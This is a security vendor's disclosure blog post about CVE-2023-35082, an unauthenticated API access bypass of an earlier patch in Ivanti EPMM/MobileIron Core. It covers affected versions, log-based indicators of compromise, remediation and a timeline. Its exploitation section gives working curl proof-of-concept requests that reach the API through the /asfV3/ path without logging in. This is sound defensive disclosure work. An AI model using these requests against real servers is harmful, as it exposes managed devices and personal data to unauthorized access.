CVE-2023-35082 - MobileIron Core Unauthenticated API Access Vulnerability

Last updated at Fri, 19 Jan 2024 10:24:39 GMT

When this blog was originally published on August 2, it said that CVE-2023-35082 only affected MobileIron Core 11.2 and earlier, which are unsupported. On August 7, Ivanti published an updated advisory noting that since originally disclosing CVE-2023-35082, they have continued their investigation and have found that the vulnerability impacts all versions of Ivanti Endpoint Manager Mobile (EPMM) 11.10, 11.9 and 11.8, and MobileIron Core 11.7 and below. The risk of exploitation depends on the individual customer’s configurations.

Overview

While investigating CVE-2023-35078, a critical API access vulnerability in Ivanti Endpoint Manager Mobile and MobileIron Core that was exploited in the wild, Rapid7 discovered a new vulnerability that allows unauthenticated attackers to access the API (originally thought to only affect 11.2 and below). Rapid7 reported this vulnerability to Ivanti on July 26, 2023 in accordance with our vulnerability disclosure policy. The new vulnerability was assigned CVE-2023-35082.

Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain, Rapid7 would consider this new vulnerability a patch bypass for CVE-2023-35078. For additional context on CVE-2023-35078 and its impact, see Rapid7’s emergent threat response blog here and our AttackerKB assessment of the vulnerability.

Note: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-35082 to its Known Exploited Vulnerabilities (KEV) list as of January 18, 2024.

Product Description

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, is a management platform that allows an organization to manage mobile devices such as phones and tablets; enforcing content and application policies on these devices. The product was previously called MobileIron Core, and was rebranded to Endpoint Manager Mobile after Ivanti acquired MobileIron in 2020.

Versions 11.8 and above of the product are Endpoint Manager Mobile. The version of the product Rapid7 determined was vulnerable to CVE-2023-35082 is MobileIron Core. Before initial disclosure on August 2, Ivanti told Rapid7 that CVE-2023-35082 affects the following versions of the product:

• MobileIron Core 11.2 and below

As of August 7, 2023, Ivanti has indicated that CVE-2023-35082 affects the following versions of the product:

• Endpoint Manager Mobile 11.10
• Endpoint Manager Mobile 11.9
• Endpoint Manager Mobile 11.8
• MobileIron Core 11.7 and below

Ivanti has an updated advisory here as of August 7.

Credit

This issue was originally discovered by Stephen Fewer, Principal Security Researcher at Rapid7, and is being disclosed in accordance with Rapid7's vulnerability disclosure policy. Rapid7 thanks Florian Hauser of CODE WHITE for reaching out to us to note that a later version of Endpoint Manager Mobile appeared to be vulnerable to CVE-2023-35082 in tests CODE WHITE was conducting.

Vendor Statement

Ivanti provided the following updated statement to Rapid7 on August 7:

We are grateful to Rapid7 and Stephen Fewer for the discovery of an issue now reported as CVE-2023-35082 in MobileIron Core / Ivanti EPMM. Ivanti has an RPM script available now and is working with customers to help them apply the fix.

We are continuing our investigation into Ivanti Endpoint Manager Mobile (EPMM) and actively working with our customers to mitigate the risk and secure their environment. We will continue to update the Ivanti blog as we have more information.

Impact

CVE-2023-35082 allows a remote unauthenticated attacker to access the API endpoints on an exposed management server. An attacker can use these API endpoints to perform a multitude of operations as outlined in the official API documents, including the ability to disclose personally identifiable information (PII) and perform modifications to the platform. Additionally, should a separate vulnerability be present in the API, an attacker can chain these vulnerabilities together. For example, CVE-2023-35081 could be chained with CVE-2023-35082 to allow an attacker write malicious webshell files to the appliance, which may then be executed by the attacker.

Exploitation

In our testing of CVE-2023-35078, we had access to MobileIron Core version 11.2.0.0-31. After reproducing the original vulnerability, we proceeded to apply Ivanti’s hotfix ivanti-security-update-1.0.0-1.noarch.rpm as per the Ivanti Knowledge Base article 000087042. We verified that the hotfix does successfully remediate CVE-2023-35078. However, we found a variation of the same attack that enables a remote attacker to access the API endpoints without authentication.

First we installed MobileIron Core 11.2.0.0-31 and verified we could leverage CVE-2023-35078 to access an API endpoint unauthenticated. Note the inclusion of the /aad/ segment in the URL path to exploit the original vulnerability, CVE-2023-35078.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

We then installed the vendor-supplied hotfix ivanti-security-update-1.0.0-1.noarch.rpm. After we rebooted the system, we verified the hotfix prevents the original exploit request shown above.

c:\> curl -k https://192.168.86.103/mifs/aad/api/v2/ping
<html>
<body>
        <h2>HTTP Status 403 - Access is denied</h2>
        <h3>You are unauthorized to access this page.</h3>
</body>
</html>

However, a variation of the above request is still able to access the API endpoints without authentication, as shown below. Note the use of /asfV3/ in the URL path in place of the original exploit’s use of /aad/.

c:\> curl -k https://192.168.86.103/mifs/asfV3/api/v2/ping
{"results":{"apiVersion":2.0,"vspVersion":"VSP 11.2.0.0 Build 31 "}}

Indicators of Compromise

The following indicators of compromise are present in the Apache HTTP logs stored on the appliance.

The log file /var/log/httpd/http-access_log will have an entry showing a request to a targeted API endpoint, containing /mifs/asfV3/api/v2/ in the path with a HTTP response code of 200. Blocked exploitation attempts will show an HTTP response code of either 401 or 403. For example:

192.168.86.34:61736 - - 2023-07-28--15-24-51 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 200 68 "-" "curl/8.0.1" 3285

Similarly, the log file /var/log/httpd/http-request_log will have an entry showing a request to a targeted API endpoint containing /mifs/asfV3/api/v2/ in the path. For example:

2023-07-28--15-24-51 192.168.86.34 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /mifs/asfV3/api/v2/ping HTTP/1.1" 68 "-" "curl/8.0.1"

Note that log entries containing /mifs/asfV3/api/v2/ in the path indicate exploitation of CVE-2023-35082, whilst log entries containing /mifs/aad/api/v2/ in the path indicate exploitation of CVE-2023-35078.

Remediation

As noted in their advisory, Ivanti has an RPM Fix for versions 11.10 to 11.3 available as of August 7, 2023. Customers on older versions should first upgrade to 11.10 and then apply the RPM fix. More information is available in a Knowledge Base article on the Ivanti Community portal.

Rapid7 advises MobileIron Core customers to upgrade to a supported version as soon as possible. Customers running Endpoint Manager Mobile versions vulnerable to CVE-2023-35082 should apply Ivanti's RPM Fix as soon as possible, without waiting for a regular patch cycle to occur.

Rapid7 Customers

An unauthenticated vulnerability check for CVE-2023-35082 is available to InsightVM and Nexpose customers as of the August 2, 2023 content release.

Timeline

• July 26, 2023: Rapid7 sends disclosure information to Ivanti security.
• July 28, 2023: Rapid7 contacts Ivanti via a second channel to confirm receipt of disclosure information. Ivanti confirms initial disclosure was not received. Rapid7 resends disclosure documents. Ivanti confirms receipt.
• July 28, 2023: Ivanti confirms findings.
• July 31, 2023: Ivanti confirms a security advisory will be published, requests a call with Rapid7 to address what they consider inaccuracies in our disclosure.
• August 1, 2023: Rapid7 and Ivanti discuss the two vulnerabilities (CVE-2023-35078, CVE-2023-35082). Rapid7 agrees to update this disclosure with points of clarification to highlight Ivanti’s perspective. Rapid7 also agrees to clarify product terminology (i.e., that CVE-2023-35082 only affects MobileIron Core, not later versions of the product which were renamed Endpoint Manager Mobile).
• August 2, 2023: This disclosure.
• August 3-4, 2023: An external research contact, Florian Hauser of CODE WHITE, reaches out to Rapid7 to disclose that they have discovered that the latest version (at the time) of Endpoint Manager Mobile, 11.10.03 Build 2, was vulnerable to CVE-2023-35082 in a specific configuration. Rapid7 contacts Ivanti, who indicates they are investigating.
• August 6, 2023: Ivanti confirms to Rapid7 that additional versions of the product are vulnerable to CVE-2023-35082, proposes an August 7 disclosure that will note new fixes.
• August 7, 2023: This updated disclosure.
• January 18, 2024: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-35082 to its Known Exploited Vulnerabilities (KEV) list.